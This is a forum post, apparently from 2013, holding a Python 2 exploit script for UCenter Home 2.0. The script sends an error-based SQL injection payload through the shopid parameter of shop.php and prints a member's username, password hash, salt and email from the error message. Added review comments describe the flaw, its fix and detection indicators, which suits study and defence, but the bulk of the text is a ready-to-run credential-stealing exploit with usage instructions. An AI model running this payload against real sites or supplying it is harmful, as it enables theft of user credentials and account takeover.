标题:
UCenter Home 2.0 EXP
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
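#!/usr/bin/env python
# Python 2 script: it uses urllib2 and the print statement.
import sys
import urllib2
import re
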
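def info():
    """Print the script's provenance lines and its command-line usage."""
    # Kept on one line: a newline inside a single-quoted literal is a syntax error.
    print 'From: http://www.exploit-db.com/exploits/14997/'
    print 'http://www.hake.cc/Web_loudong/'
    print 'changed:qiaoy'
    print 'exp:'
    print ' ./UCenter_Home_2.0.py site'
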
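def main():
    """Send one crafted GET request to <site>/shop.php and print fields parsed from the reply.

    Expects exactly one command-line argument (the site). With any other
    argument count it prints the usage banner via info() and does nothing else.

    Review notes (defensive reading of what the code below shows):
      * The request places a SQL subquery inside the ``shopid`` query
        parameter, so the target page presumably builds its statement by
        concatenating that parameter. The application-side fix is to coerce
        ``shopid`` to an integer or bind it as a query parameter.
      * The values are read back from a MySQL "Duplicate entry ... for key"
        error found in the HTTP response body, which presupposes that the
        application shows database errors to clients. Suppressing that
        output removes this read-back channel but not the underlying flaw.
      * Request-side indicators visible in the URL literal:
        ``information_schema``, ``floor(rand(0)*2)``, ``group+by`` and
        ``concat(0x7e,0x27`` inside a ``shopid`` value.
      * Response-side indicator: the string "Duplicate entry '~'" in a page
        body.
      * The subquery selects uid, username, password, salt and email from
        ``ucenter.uc_members``; the database account used by the web
        application should not be able to read another schema's member
        table or ``information_schema`` beyond what it needs.
    """
    if len(sys.argv) != 2:
        info()
    else:
        site = sys.argv[1]
        # Prefix a scheme only when the argument has none.
        if site[0:7] == 'http://':
            # NOTE(review): 'sitesite' is never read; this branch leaves 'site' as given.
            sitesite =site
        elif site[0:8] == 'https://':
            # NOTE(review): same unused name as above.
            sitesite = site
        else:
            site = 'http://'+site
        try:
            # Single request; the whole query string is a fixed literal appended to the site.
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
            # No timeout is passed to urlopen, so the call can block indefinitely.
            Value = urllib2.urlopen(url).read()
            # Takes the text between the '~' markers in the echoed error message;
            # [0] raises IndexError when the response carries no such message.
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
            # Fields are ':'-separated (0x3a in the query); index 0 is the uid and is not printed.
            hacked = Msg.split(':')
            print 'Name: '+hacked[1]
            print 'Passwd: '+hacked[2]
            print 'salt: '+hacked[3]
            print 'email: '+hacked[4]
        except:
            # Bare except: network errors, a response without the error text and a
            # short field list all collapse into this one message.
            print 'Sorry,I can\'t work............'
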
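# Run main() only when the file is executed as a script, not when it is imported.
if __name__ == '__main__':
    main()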